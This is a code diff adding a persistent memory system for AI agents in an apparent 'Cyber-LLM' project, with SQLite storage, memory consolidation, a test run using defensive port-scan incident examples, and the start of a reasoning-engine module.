+ """, ( + semantic_memory.memory_id, + agent_id, + semantic_memory.memory_type.value, + json.dumps(asdict(semantic_memory)), + semantic_memory.timestamp, + semantic_memory.importance, + semantic_memory.access_count, + semantic_memory.last_accessed, + json.dumps(semantic_memory.tags), + json.dumps(semantic_memory.metadata) + )) + + consolidated_count += 1 + + return consolidated_count + + def _group_similar_memories(self, memories: List[Tuple]) -> List[List[Dict]]: + """Group similar episodic memories together""" + memory_groups = [] + processed_memories = set() + + for i, memory in enumerate(memories): + if i in processed_memories: + continue + + current_group = [memory] + memory_content = json.loads(memory[1]) + + for j, other_memory in enumerate(memories[i+1:], i+1): + if j in processed_memories: + continue + + other_content = json.loads(other_memory[1]) + similarity = self._calculate_memory_similarity(memory_content, other_content) + + if similarity >= self.consolidation_rules['episodic_to_semantic']['similarity_threshold']: + current_group.append(other_memory) + processed_memories.add(j) + + if len(current_group) > 1: + memory_groups.append(current_group) + + processed_memories.add(i) + + return memory_groups + + def _calculate_memory_similarity(self, content1: Dict, content2: Dict) -> float: + """Calculate similarity between two memory contents""" + # Simple similarity based on common keys and values + common_keys = set(content1.keys()) & set(content2.keys()) + + if not common_keys: + return 0.0 + + similarity_scores = [] + + for key in common_keys: + val1, val2 = content1[key], content2[key] + + if isinstance(val1, str) and isinstance(val2, str): + # String similarity (simplified) + similarity_scores.append(1.0 if val1 == val2 else 0.5 if val1.lower() in val2.lower() else 0.0) + elif isinstance(val1, (int, float)) and isinstance(val2, (int, float)): + # Numeric similarity + max_val = max(abs(val1), abs(val2)) + if max_val > 0: + similarity_scores.append(1.0 
    def _create_semantic_from_episodic_group(self, memory_group: List[Tuple], agent_id: str) -> Optional[SemanticMemory]:
        """Create semantic memory from a group of similar episodic memories.

        Rows follow the SELECT in _consolidate_episodic_to_semantic:
        row[0]=memory_id, row[1]=content JSON, row[3]=importance.
        Returns None when the episodes share no content keys or on error
        (best-effort: failures are logged, never raised).
        """
        try:
            # Extract common patterns and concepts
            all_contents = [json.loads(memory[1]) for memory in memory_group]

            # Find common concept: keys present in every episode's content.
            common_elements = set(all_contents[0].keys())
            for content in all_contents[1:]:
                common_elements &= set(content.keys())

            if not common_elements:
                return None

            # Create semantic concept (name is synthetic, seeded by group size + time)
            concept_name = f"pattern_{len(memory_group)}_occurrences_{int(time.time())}"

            # A key whose value is identical across all episodes becomes a
            # property; otherwise the distinct stringified values are kept
            # under "<key>_variations".
            properties = {}
            for key in common_elements:
                values = [content[key] for content in all_contents]
                if len(set(map(str, values))) == 1:
                    properties[key] = values[0]  # Consistent value
                else:
                    properties[f"{key}_variations"] = list(set(map(str, values)))

            # Calculate confidence based on consistency and frequency:
            # saturates at 1.0 once 10+ episodes support the pattern.
            confidence = min(1.0, len(memory_group) / 10.0)

            semantic_memory = SemanticMemory(
                memory_id=f"semantic_{uuid.uuid4().hex[:8]}",
                memory_type=MemoryType.SEMANTIC,
                content={},
                timestamp=datetime.now().isoformat(),
                # Average importance of the source episodes (row[3]).
                importance=sum(memory[3] for memory in memory_group) / len(memory_group),
                access_count=0,
                last_accessed=datetime.now().isoformat(),
                tags=["consolidated", "pattern"],
                metadata={"source_episodic_count": len(memory_group)},
                concept=concept_name,
                properties=properties,
                relationships=[],
                confidence=confidence,
                # Source episode ids (row[0]) kept as provenance.
                evidence=[memory[0] for memory in memory_group]
            )

            return semantic_memory

        except Exception as e:
            self.logger.error(f"Error creating semantic memory from episodic group: {e}")
            return None
str) -> int: + """Update relationships between semantic memories""" + updates_count = 0 + + with sqlite3.connect(self.database_path) as conn: + # Get all semantic memories + cursor = conn.execute(""" + SELECT memory_id, content FROM memory_items + WHERE agent_id = ? AND memory_type = 'semantic' + """, (agent_id,)) + + semantic_memories = cursor.fetchall() + + # Find and update relationships + for i, memory1 in enumerate(semantic_memories): + memory1_content = json.loads(memory1[1]) + + for memory2 in semantic_memories[i+1:]: + memory2_content = json.loads(memory2[1]) + + # Check for potential relationships + relationship = self._identify_semantic_relationship(memory1_content, memory2_content) + + if relationship: + # Update both memories with the relationship + self._update_memory_relationships(conn, memory1[0], relationship) + self._update_memory_relationships(conn, memory2[0], relationship) + updates_count += 1 + + return updates_count + + def _identify_semantic_relationship(self, content1: Dict, content2: Dict) -> Optional[Dict[str, Any]]: + """Identify relationships between semantic memories""" + # Simple relationship detection based on content overlap + common_properties = set() + + if 'properties' in content1 and 'properties' in content2: + props1 = content1['properties'] + props2 = content2['properties'] + + for key in props1: + if key in props2 and props1[key] == props2[key]: + common_properties.add(key) + + if len(common_properties) >= 2: + return { + 'type': 'similarity', + 'strength': len(common_properties) / max(len(content1.get('properties', {})), len(content2.get('properties', {})), 1), + 'common_properties': list(common_properties) + } + + return None + + def _update_memory_relationships(self, conn: sqlite3.Connection, memory_id: str, relationship: Dict[str, Any]): + """Update memory with new relationship""" + cursor = conn.execute("SELECT content FROM memory_items WHERE memory_id = ?", (memory_id,)) + result = cursor.fetchone() + + if result: + 
content = json.loads(result[0]) + if 'relationships' not in content: + content['relationships'] = [] + + content['relationships'].append(relationship) + + conn.execute( + "UPDATE memory_items SET content = ?, last_accessed = ? WHERE memory_id = ?", + (json.dumps(content), datetime.now().isoformat(), memory_id) + ) + + async def _optimize_procedural_memories(self, agent_id: str) -> int: + """Optimize procedural memories based on success rates""" + optimizations = 0 + + with sqlite3.connect(self.database_path) as conn: + cursor = conn.execute(""" + SELECT memory_id, content FROM memory_items + WHERE agent_id = ? AND memory_type = 'procedural' + """, (agent_id,)) + + procedural_memories = cursor.fetchall() + + for memory_id, content_json in procedural_memories: + content = json.loads(content_json) + + if 'success_rate' in content and content['success_rate'] < 0.7: + # Optimize low-performing procedures + optimized_steps = self._optimize_procedure_steps(content.get('steps', [])) + + if optimized_steps != content.get('steps', []): + content['steps'] = optimized_steps + content['optimization_history'] = content.get('optimization_history', []) + content['optimization_history'].append({ + 'timestamp': datetime.now().isoformat(), + 'type': 'step_optimization', + 'previous_success_rate': content.get('success_rate', 0.0) + }) + + conn.execute( + "UPDATE memory_items SET content = ?, last_accessed = ? 
WHERE memory_id = ?", + (json.dumps(content), datetime.now().isoformat(), memory_id) + ) + + optimizations += 1 + + return optimizations + + def _optimize_procedure_steps(self, steps: List[Dict[str, Any]]) -> List[Dict[str, Any]]: + """Optimize procedure steps for better success rate""" + # Simple optimization: reorder steps by success probability + optimized_steps = sorted(steps, key=lambda x: x.get('success_probability', 0.5), reverse=True) + + # Add validation steps + for step in optimized_steps: + if 'validation' not in step: + step['validation'] = { + 'check_conditions': True, + 'verify_outcome': True, + 'rollback_on_failure': True + } + + return optimized_steps + + async def _cleanup_working_memory(self, agent_id: str) -> int: + """Clean up old and low-importance working memory items""" + cleanup_count = 0 + + with sqlite3.connect(self.database_path) as conn: + # Remove old working memory items + cutoff_time = (datetime.now() - timedelta( + hours=self.consolidation_rules['working_memory_cleanup']['max_age_hours'] + )).isoformat() + + cursor = conn.execute(""" + DELETE FROM memory_items + WHERE agent_id = ? AND memory_type = 'working' + AND (timestamp < ? OR importance < ?) + """, (agent_id, cutoff_time, self.consolidation_rules['working_memory_cleanup']['importance_threshold'])) + + cleanup_count = cursor.rowcount + + # Limit working memory to max items + cursor = conn.execute(""" + SELECT memory_id FROM memory_items + WHERE agent_id = ? 
AND memory_type = 'working' + ORDER BY importance DESC, last_accessed DESC + """, (agent_id,)) + + working_memories = cursor.fetchall() + max_items = self.consolidation_rules['working_memory_cleanup']['max_items'] + + if len(working_memories) > max_items: + memories_to_delete = working_memories[max_items:] + for memory_id_tuple in memories_to_delete: + conn.execute("DELETE FROM memory_items WHERE memory_id = ?", memory_id_tuple) + cleanup_count += 1 + + return cleanup_count + + async def _update_strategic_plans(self, agent_id: str) -> int: + """Update strategic plans based on progress and dependencies""" + updates = 0 + + with sqlite3.connect(self.database_path) as conn: + cursor = conn.execute(""" + SELECT memory_id, content FROM memory_items + WHERE agent_id = ? AND memory_type = 'strategic' + """, (agent_id,)) + + strategic_memories = cursor.fetchall() + + for memory_id, content_json in strategic_memories: + content = json.loads(content_json) + updated = False + + # Update progress based on completed steps + if 'plan_steps' in content: + completed_steps = sum(1 for step in content['plan_steps'] if step.get('completed', False)) + total_steps = len(content['plan_steps']) + + if total_steps > 0: + new_progress = completed_steps / total_steps + if new_progress != content.get('progress', 0.0): + content['progress'] = new_progress + updated = True + + # Check deadlines and adjust priorities + if 'deadline' in content and content['deadline']: + deadline = datetime.fromisoformat(content['deadline']) + days_until_deadline = (deadline - datetime.now()).days + + if days_until_deadline <= 7 and content.get('priority', 0) < 8: + content['priority'] = min(10, content.get('priority', 0) + 2) + updated = True + + # Check dependencies + if 'dependencies' in content: + resolved_dependencies = [] + for dep in content['dependencies']: + if self._is_dependency_resolved(conn, agent_id, dep): + resolved_dependencies.append(dep) + + if resolved_dependencies: + content['dependencies'] = 
[dep for dep in content['dependencies'] + if dep not in resolved_dependencies] + updated = True + + if updated: + conn.execute( + "UPDATE memory_items SET content = ?, last_accessed = ? WHERE memory_id = ?", + (json.dumps(content), datetime.now().isoformat(), memory_id) + ) + updates += 1 + + return updates + + def _is_dependency_resolved(self, conn: sqlite3.Connection, agent_id: str, dependency: str) -> bool: + """Check if a strategic dependency has been resolved""" + cursor = conn.execute(""" + SELECT COUNT(*) FROM memory_items + WHERE agent_id = ? AND memory_type = 'strategic' + AND content LIKE ? AND content LIKE '%"progress": 1.0%' + """, (agent_id, f'%{dependency}%')) + + return cursor.fetchone()[0] > 0 + +class PersistentMemorySystem: + """Main persistent memory system for cognitive agents""" + + def __init__(self, database_path: str = "data/cognitive/persistent_memory.db"): + self.database_path = Path(database_path) + self.database_path.parent.mkdir(parents=True, exist_ok=True) + + self.logger = logging.getLogger(__name__) + self.consolidator = MemoryConsolidator(str(self.database_path)) + + # Initialize database + self._init_database() + + # Background consolidation + self.consolidation_running = False + self.consolidation_interval = 6 * 60 * 60 # 6 hours + + def _init_database(self): + """Initialize SQLite database for persistent memory""" + with sqlite3.connect(self.database_path) as conn: + conn.execute("PRAGMA journal_mode=WAL") + conn.execute("PRAGMA synchronous=NORMAL") + conn.execute("PRAGMA cache_size=10000") + conn.execute("PRAGMA temp_store=memory") + + # Memory items table + conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_items ( + memory_id TEXT PRIMARY KEY, + agent_id TEXT NOT NULL, + memory_type TEXT NOT NULL, + content TEXT NOT NULL, + timestamp TEXT NOT NULL, + importance REAL NOT NULL, + access_count INTEGER DEFAULT 0, + last_accessed TEXT NOT NULL, + tags TEXT NOT NULL, + metadata TEXT NOT NULL, + expires_at TEXT, + created_at 
TIMESTAMP DEFAULT CURRENT_TIMESTAMP + ) + """) + + # Reasoning chains table + conn.execute(""" + CREATE TABLE IF NOT EXISTS reasoning_chains ( + chain_id TEXT PRIMARY KEY, + agent_id TEXT NOT NULL, + reasoning_type TEXT NOT NULL, + premise TEXT NOT NULL, + steps TEXT NOT NULL, + conclusion TEXT NOT NULL, + confidence REAL NOT NULL, + evidence TEXT NOT NULL, + timestamp TEXT NOT NULL, + context TEXT NOT NULL, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP + ) + """) + + # Memory associations table + conn.execute(""" + CREATE TABLE IF NOT EXISTS memory_associations ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + memory_id_1 TEXT NOT NULL, + memory_id_2 TEXT NOT NULL, + association_type TEXT NOT NULL, + strength REAL NOT NULL, + created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (memory_id_1) REFERENCES memory_items (memory_id), + FOREIGN KEY (memory_id_2) REFERENCES memory_items (memory_id) + ) + """) + + # Create indexes + conn.execute("CREATE INDEX IF NOT EXISTS idx_memory_agent_type ON memory_items (agent_id, memory_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_memory_timestamp ON memory_items (timestamp)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_memory_importance ON memory_items (importance)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_reasoning_agent ON reasoning_chains (agent_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_reasoning_type ON reasoning_chains (reasoning_type)") + + async def store_memory(self, agent_id: str, memory: MemoryItem) -> bool: + """Store a memory item""" + try: + with sqlite3.connect(self.database_path) as conn: + conn.execute(""" + INSERT OR REPLACE INTO memory_items + (memory_id, agent_id, memory_type, content, timestamp, importance, + access_count, last_accessed, tags, metadata, expires_at) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) 
+ """, ( + memory.memory_id, + agent_id, + memory.memory_type.value, + json.dumps(asdict(memory)), + memory.timestamp, + memory.importance, + memory.access_count, + memory.last_accessed, + json.dumps(memory.tags), + json.dumps(memory.metadata), + memory.expires_at + )) + + self.logger.debug(f"Stored memory {memory.memory_id} for agent {agent_id}") + return True + + except Exception as e: + self.logger.error(f"Error storing memory {memory.memory_id} for agent {agent_id}: {e}") + return False + + async def retrieve_memories(self, agent_id: str, memory_type: Optional[MemoryType] = None, + tags: Optional[List[str]] = None, limit: int = 100) -> List[MemoryItem]: + """Retrieve memories for an agent""" + memories = [] + + try: + with sqlite3.connect(self.database_path) as conn: + query = "SELECT * FROM memory_items WHERE agent_id = ?" + params = [agent_id] + + if memory_type: + query += " AND memory_type = ?" + params.append(memory_type.value) + + if tags: + tag_conditions = " AND (" + " OR ".join(["tags LIKE ?" for _ in tags]) + ")" + query += tag_conditions + params.extend([f"%{tag}%" for tag in tags]) + + query += " ORDER BY importance DESC, last_accessed DESC LIMIT ?" + params.append(limit) + + cursor = conn.execute(query, params) + rows = cursor.fetchall() + + for row in rows: + # Update access count + conn.execute( + "UPDATE memory_items SET access_count = access_count + 1, last_accessed = ? 
WHERE memory_id = ?", + (datetime.now().isoformat(), row[0]) + ) + + # Reconstruct memory object + memory_data = json.loads(row[3]) + memory_type_enum = MemoryType(row[2]) + + if memory_type_enum == MemoryType.EPISODIC: + memory = EpisodicMemory(**memory_data) + elif memory_type_enum == MemoryType.SEMANTIC: + memory = SemanticMemory(**memory_data) + elif memory_type_enum == MemoryType.PROCEDURAL: + memory = ProceduralMemory(**memory_data) + elif memory_type_enum == MemoryType.WORKING: + memory = WorkingMemory(**memory_data) + elif memory_type_enum == MemoryType.STRATEGIC: + memory = StrategicMemory(**memory_data) + else: + memory = MemoryItem(**memory_data) + + memories.append(memory) + + self.logger.debug(f"Retrieved {len(memories)} memories for agent {agent_id}") + + except Exception as e: + self.logger.error(f"Error retrieving memories for agent {agent_id}: {e}") + + return memories + + async def store_reasoning_chain(self, reasoning_chain: ReasoningChain) -> bool: + """Store a reasoning chain""" + try: + with sqlite3.connect(self.database_path) as conn: + conn.execute(""" + INSERT OR REPLACE INTO reasoning_chains + (chain_id, agent_id, reasoning_type, premise, steps, conclusion, + confidence, evidence, timestamp, context) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?) 
+ """, ( + reasoning_chain.chain_id, + reasoning_chain.agent_id, + reasoning_chain.reasoning_type.value, + json.dumps(reasoning_chain.premise), + json.dumps(reasoning_chain.steps), + json.dumps(reasoning_chain.conclusion), + reasoning_chain.confidence, + json.dumps(reasoning_chain.evidence), + reasoning_chain.timestamp, + json.dumps(reasoning_chain.context) + )) + + self.logger.debug(f"Stored reasoning chain {reasoning_chain.chain_id}") + return True + + except Exception as e: + self.logger.error(f"Error storing reasoning chain {reasoning_chain.chain_id}: {e}") + return False + + async def retrieve_reasoning_chains(self, agent_id: str, reasoning_type: Optional[ReasoningType] = None, + limit: int = 50) -> List[ReasoningChain]: + """Retrieve reasoning chains for an agent""" + chains = [] + + try: + with sqlite3.connect(self.database_path) as conn: + query = "SELECT * FROM reasoning_chains WHERE agent_id = ?" + params = [agent_id] + + if reasoning_type: + query += " AND reasoning_type = ?" + params.append(reasoning_type.value) + + query += " ORDER BY confidence DESC, timestamp DESC LIMIT ?" 
+ params.append(limit) + + cursor = conn.execute(query, params) + rows = cursor.fetchall() + + for row in rows: + chain = ReasoningChain( + chain_id=row[0], + agent_id=row[1], + reasoning_type=ReasoningType(row[2]), + premise=json.loads(row[3]), + steps=json.loads(row[4]), + conclusion=json.loads(row[5]), + confidence=row[6], + evidence=json.loads(row[7]), + timestamp=row[8], + context=json.loads(row[9]) + ) + chains.append(chain) + + self.logger.debug(f"Retrieved {len(chains)} reasoning chains for agent {agent_id}") + + except Exception as e: + self.logger.error(f"Error retrieving reasoning chains for agent {agent_id}: {e}") + + return chains + + async def create_memory_association(self, memory_id_1: str, memory_id_2: str, + association_type: str, strength: float) -> bool: + """Create an association between two memories""" + try: + with sqlite3.connect(self.database_path) as conn: + conn.execute(""" + INSERT INTO memory_associations (memory_id_1, memory_id_2, association_type, strength) + VALUES (?, ?, ?, ?) + """, (memory_id_1, memory_id_2, association_type, strength)) + + return True + + except Exception as e: + self.logger.error(f"Error creating memory association: {e}") + return False + + async def find_associated_memories(self, memory_id: str, min_strength: float = 0.5) -> List[Tuple[str, str, float]]: + """Find memories associated with a given memory""" + associations = [] + + try: + with sqlite3.connect(self.database_path) as conn: + cursor = conn.execute(""" + SELECT memory_id_2, association_type, strength + FROM memory_associations + WHERE memory_id_1 = ? AND strength >= ? + UNION + SELECT memory_id_1, association_type, strength + FROM memory_associations + WHERE memory_id_2 = ? AND strength >= ? 
+ ORDER BY strength DESC + """, (memory_id, min_strength, memory_id, min_strength)) + + associations = cursor.fetchall() + + except Exception as e: + self.logger.error(f"Error finding associated memories for {memory_id}: {e}") + + return associations + + def start_background_consolidation(self): + """Start background memory consolidation process""" + if self.consolidation_running: + return + + self.consolidation_running = True + + def consolidation_loop(): + while self.consolidation_running: + try: + # Get all agents with memories + with sqlite3.connect(self.database_path) as conn: + cursor = conn.execute("SELECT DISTINCT agent_id FROM memory_items") + agent_ids = [row[0] for row in cursor.fetchall()] + + # Consolidate memories for each agent + for agent_id in agent_ids: + asyncio.run(self.consolidator.consolidate_memories(agent_id)) + + # Sleep until next consolidation cycle + time.sleep(self.consolidation_interval) + + except Exception as e: + self.logger.error(f"Error in background consolidation: {e}") + time.sleep(300) # Wait 5 minutes before retrying + + consolidation_thread = threading.Thread(target=consolidation_loop, daemon=True) + consolidation_thread.start() + + self.logger.info("Started background memory consolidation") + + def stop_background_consolidation(self): + """Stop background memory consolidation process""" + self.consolidation_running = False + self.logger.info("Stopped background memory consolidation") + + def get_memory_statistics(self, agent_id: str) -> Dict[str, Any]: + """Get memory statistics for an agent""" + stats = {} + + try: + with sqlite3.connect(self.database_path) as conn: + # Total memory counts by type + cursor = conn.execute(""" + SELECT memory_type, COUNT(*) FROM memory_items + WHERE agent_id = ? 
GROUP BY memory_type + """, (agent_id,)) + + memory_counts = dict(cursor.fetchall()) + stats['memory_counts'] = memory_counts + + # Total memories + stats['total_memories'] = sum(memory_counts.values()) + + # Memory importance distribution + cursor = conn.execute(""" + SELECT AVG(importance), MIN(importance), MAX(importance) + FROM memory_items WHERE agent_id = ? + """, (agent_id,)) + + importance_stats = cursor.fetchone() + stats['importance_stats'] = { + 'average': importance_stats[0] or 0.0, + 'minimum': importance_stats[1] or 0.0, + 'maximum': importance_stats[2] or 0.0 + } + + # Recent activity + cursor = conn.execute(""" + SELECT COUNT(*) FROM memory_items + WHERE agent_id = ? AND last_accessed >= ? + """, (agent_id, (datetime.now() - timedelta(days=1)).isoformat())) + + stats['recent_access_count'] = cursor.fetchone()[0] + + # Reasoning chain stats + cursor = conn.execute(""" + SELECT reasoning_type, COUNT(*) FROM reasoning_chains + WHERE agent_id = ? GROUP BY reasoning_type + """, (agent_id,)) + + reasoning_counts = dict(cursor.fetchall()) + stats['reasoning_counts'] = reasoning_counts + stats['total_reasoning_chains'] = sum(reasoning_counts.values()) + + # Association stats + cursor = conn.execute(""" + SELECT COUNT(*) FROM memory_associations ma + JOIN memory_items mi1 ON ma.memory_id_1 = mi1.memory_id + JOIN memory_items mi2 ON ma.memory_id_2 = mi2.memory_id + WHERE mi1.agent_id = ? OR mi2.agent_id = ? 
+ """, (agent_id, agent_id)) + + stats['association_count'] = cursor.fetchone()[0] + + except Exception as e: + self.logger.error(f"Error getting memory statistics for agent {agent_id}: {e}") + stats = {'error': str(e)} + + return stats + +# Example usage and testing +if __name__ == "__main__": + print("๐Ÿง  Persistent Memory Architecture Testing:") + print("=" * 50) + + # Initialize persistent memory system + memory_system = PersistentMemorySystem() + + # Start background consolidation + memory_system.start_background_consolidation() + + async def test_memory_operations(): + agent_id = "test_agent_001" + + # Test episodic memory storage + print("\n๐Ÿ“š Testing episodic memory storage...") + episodic_memory = EpisodicMemory( + memory_id="episode_001", + memory_type=MemoryType.EPISODIC, + content={}, + timestamp=datetime.now().isoformat(), + importance=0.8, + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["security_incident", "network_scan"], + metadata={"source": "ids_alert"}, + event_type="network_scan_detected", + context={"source_ip": "192.168.1.100", "target_ports": [22, 80, 443]}, + outcome={"blocked": True, "alert_generated": True}, + learned_patterns=["port_scan_pattern"], + emotional_valence=0.2 + ) + + success = await memory_system.store_memory(agent_id, episodic_memory) + print(f" Stored episodic memory: {success}") + + # Test semantic memory storage + print("\n๐Ÿง  Testing semantic memory storage...") + semantic_memory = SemanticMemory( + memory_id="semantic_001", + memory_type=MemoryType.SEMANTIC, + content={}, + timestamp=datetime.now().isoformat(), + importance=0.9, + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["cybersecurity_knowledge", "network_security"], + metadata={"domain": "network_security"}, + concept="port_scanning", + properties={ + "definition": "Systematic probing of network ports to identify services", + "indicators": ["sequential_port_access", "connection_attempts", "timeout_patterns"], + 
"countermeasures": ["port_blocking", "rate_limiting", "intrusion_detection"] + }, + relationships=[], + confidence=0.95, + evidence=["rfc_standards", "security_literature"] + ) + + success = await memory_system.store_memory(agent_id, semantic_memory) + print(f" Stored semantic memory: {success}") + + # Test procedural memory storage + print("\nโš™๏ธ Testing procedural memory storage...") + procedural_memory = ProceduralMemory( + memory_id="procedure_001", + memory_type=MemoryType.PROCEDURAL, + content={}, + timestamp=datetime.now().isoformat(), + importance=0.7, + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["incident_response", "network_security"], + metadata={"category": "defensive_procedures"}, + skill_name="network_scan_response", + steps=[ + {"step": 1, "action": "identify_source", "success_probability": 0.9}, + {"step": 2, "action": "block_source_ip", "success_probability": 0.95}, + {"step": 3, "action": "generate_alert", "success_probability": 1.0}, + {"step": 4, "action": "investigate_context", "success_probability": 0.8} + ], + conditions={"trigger": "port_scan_detected", "confidence": ">0.8"}, + success_rate=0.85, + optimization_history=[] + ) + + success = await memory_system.store_memory(agent_id, procedural_memory) + print(f" Stored procedural memory: {success}") + + # Test strategic memory storage + print("\n๐ŸŽฏ Testing strategic memory storage...") + strategic_memory = StrategicMemory( + memory_id="strategic_001", + memory_type=MemoryType.STRATEGIC, + content={}, + timestamp=datetime.now().isoformat(), + importance=1.0, + access_count=0, + last_accessed=datetime.now().isoformat(), + tags=["long_term_goal", "security_posture"], + metadata={"category": "defensive_strategy"}, + goal="improve_network_security_posture", + plan_steps=[ + {"step": 1, "description": "Deploy additional IDS sensors", "completed": False, "target_date": "2025-08-15"}, + {"step": 2, "description": "Implement rate limiting", "completed": False, 
"target_date": "2025-08-20"}, + {"step": 3, "description": "Update response procedures", "completed": False, "target_date": "2025-08-25"} + ], + progress=0.0, + deadline=(datetime.now() + timedelta(days=30)).isoformat(), + priority=8, + dependencies=["budget_approval", "technical_resources"], + success_criteria={"scan_detection_rate": ">95%", "response_time": "<60s"} + ) + + success = await memory_system.store_memory(agent_id, strategic_memory) + print(f" Stored strategic memory: {success}") + + # Test reasoning chain storage + print("\n๐Ÿ”— Testing reasoning chain storage...") + reasoning_chain = ReasoningChain( + chain_id="reasoning_001", + reasoning_type=ReasoningType.DEDUCTIVE, + premise={ + "observation": "Multiple connection attempts to various ports from single IP", + "pattern": "Sequential port access with short intervals" + }, + steps=[ + {"step": 1, "reasoning": "Sequential port access indicates systematic scanning"}, + {"step": 2, "reasoning": "Single source IP suggests coordinated effort"}, + {"step": 3, "reasoning": "Pattern matches known port scanning signatures"} + ], + conclusion={ + "assessment": "Network port scan detected", + "confidence_level": "high", + "recommended_action": "block_and_investigate" + }, + confidence=0.92, + evidence=["network_logs", "ids_patterns", "historical_data"], + timestamp=datetime.now().isoformat(), + agent_id=agent_id, + context={"alert_id": "alert_12345", "network_segment": "dmz"} + ) + + success = await memory_system.store_reasoning_chain(reasoning_chain) + print(f" Stored reasoning chain: {success}") + + # Test memory retrieval + print("\n๐Ÿ” Testing memory retrieval...") + + # Retrieve all memories + all_memories = await memory_system.retrieve_memories(agent_id, limit=10) + print(f" Retrieved {len(all_memories)} total memories") + + # Retrieve specific memory types + episodic_memories = await memory_system.retrieve_memories(agent_id, MemoryType.EPISODIC) + print(f" Retrieved {len(episodic_memories)} episodic 
memories") + + semantic_memories = await memory_system.retrieve_memories(agent_id, MemoryType.SEMANTIC) + print(f" Retrieved {len(semantic_memories)} semantic memories") + + # Retrieve by tags + security_memories = await memory_system.retrieve_memories(agent_id, tags=["security_incident"]) + print(f" Retrieved {len(security_memories)} security-related memories") + + # Test reasoning chain retrieval + reasoning_chains = await memory_system.retrieve_reasoning_chains(agent_id) + print(f" Retrieved {len(reasoning_chains)} reasoning chains") + + # Test memory associations + print("\n๐Ÿ”— Testing memory associations...") + success = await memory_system.create_memory_association( + "episode_001", "semantic_001", "relates_to", 0.8 + ) + print(f" Created memory association: {success}") + + associations = await memory_system.find_associated_memories("episode_001") + print(f" Found {len(associations)} associations") + + # Test memory statistics + print("\n๐Ÿ“Š Testing memory statistics...") + stats = memory_system.get_memory_statistics(agent_id) + print(f" Memory statistics: {stats}") + + # Test memory consolidation + print("\n๐Ÿ”„ Testing memory consolidation...") + consolidation_results = await memory_system.consolidator.consolidate_memories(agent_id) + print(f" Consolidation results: {consolidation_results}") + + return True + + # Run async tests + import asyncio + asyncio.run(test_memory_operations()) + + # Stop background consolidation for testing + memory_system.stop_background_consolidation() + + print("\nโœ… Persistent Memory Architecture implemented and tested") + print(f" Database: {memory_system.database_path}") + print(f" Features: Episodic, Semantic, Procedural, Working, Strategic Memory") + print(f" Capabilities: Cross-session persistence, automated consolidation, reasoning chains") diff --git a/src/cognitive/persistent_reasoning_system.py b/src/cognitive/persistent_reasoning_system.py new file mode 100644 index 
"""
Advanced Reasoning Engine with Persistent Memory
Implements long-term thinking, strategic planning, and persistent memory systems

Author: Cyber-LLM Development Team
Date: August 6, 2025
Version: 2.0.0
"""

import asyncio
import json
import logging
import sqlite3
import pickle
import hashlib
from datetime import datetime, timedelta
from typing import Dict, List, Any, Optional, Tuple, Set, Union
from dataclasses import dataclass, field
from enum import Enum
import threading
import time
from collections import defaultdict, deque
from pathlib import Path
import numpy as np

# Advanced reasoning imports
from abc import ABC, abstractmethod
import uuid
import networkx as nx
import yaml

class ReasoningType(Enum):
    """Types of reasoning supported by the system.

    NOTE(review): src/cognitive/persistent_memory defines its own ReasoningType
    with a different member set — confirm the two modules are never star-imported
    into the same namespace.
    """
    DEDUCTIVE = "deductive"            # general to specific
    INDUCTIVE = "inductive"            # specific to general
    ABDUCTIVE = "abductive"            # best explanation
    ANALOGICAL = "analogical"          # similarity-based
    CAUSAL = "causal"                  # cause-effect relationships
    STRATEGIC = "strategic"            # long-term planning
    COUNTERFACTUAL = "counterfactual"  # what-if scenarios
    META_COGNITIVE = "meta_cognitive"  # reasoning about reasoning

class MemoryType(Enum):
    """Types of memory in the system."""
    WORKING = "working"        # short-term active memory
    EPISODIC = "episodic"      # specific experiences
    SEMANTIC = "semantic"      # general knowledge
    PROCEDURAL = "procedural"  # skills and procedures
    STRATEGIC = "strategic"    # long-term plans and goals

@dataclass
class ReasoningStep:
    """Individual step in a reasoning chain."""
    step_id: str = field(default_factory=lambda: str(uuid.uuid4()))
    reasoning_type: ReasoningType = ReasoningType.DEDUCTIVE
    premise: str = ""
    inference_rule: str = ""
    conclusion: str = ""
    confidence: float = 0.0
    evidence: List[str] = field(default_factory=list)
    timestamp: datetime = field(default_factory=datetime.now)
    dependencies: List[str] = field(default_factory=list)  # step_ids this step builds on

@dataclass
class ReasoningChain:
    """Complete reasoning chain with multiple steps.

    NOTE(review): shape differs from the ReasoningChain persisted by
    src/cognitive/persistent_memory (that one carries agent_id/premise dicts);
    the two are not interchangeable.
    """
    chain_id: str = field(default_factory=lambda: str(uuid.uuid4()))
    topic: str = ""
    goal: str = ""
    steps: List[ReasoningStep] = field(default_factory=list)
    conclusion: str = ""
    confidence: float = 0.0
    start_time: datetime = field(default_factory=datetime.now)
    end_time: Optional[datetime] = None
    success: bool = False
    metadata: Dict[str, Any] = field(default_factory=dict)

@dataclass
class MemoryEntry:
    """Entry in the persistent memory system."""
    memory_id: str = field(default_factory=lambda: str(uuid.uuid4()))
    memory_type: MemoryType = MemoryType.EPISODIC
    content: Dict[str, Any] = field(default_factory=dict)
    timestamp: datetime = field(default_factory=datetime.now)
    importance: float = 0.0          # relevance score; decays over time
    access_count: int = 0
    last_accessed: datetime = field(default_factory=datetime.now)
    decay_rate: float = 0.1          # exponential decay constant (per day)
    tags: Set[str] = field(default_factory=set)

@dataclass
class StrategicPlan:
    """Long-term strategic plan with goals and milestones."""
    plan_id: str = field(default_factory=lambda: str(uuid.uuid4()))
    title: str = ""
    description: str = ""
    primary_goal: str = ""
    sub_goals: List[str] = field(default_factory=list)
    timeline: Dict[str, datetime] = field(default_factory=dict)
    milestones: List[Dict[str, Any]] = field(default_factory=list)
    success_criteria: List[str] = field(default_factory=list)
    risk_factors: List[str] = field(default_factory=list)
    resources_required: List[str] = field(default_factory=list)
    current_status: str = "planning"   # lifecycle label, starts in "planning"
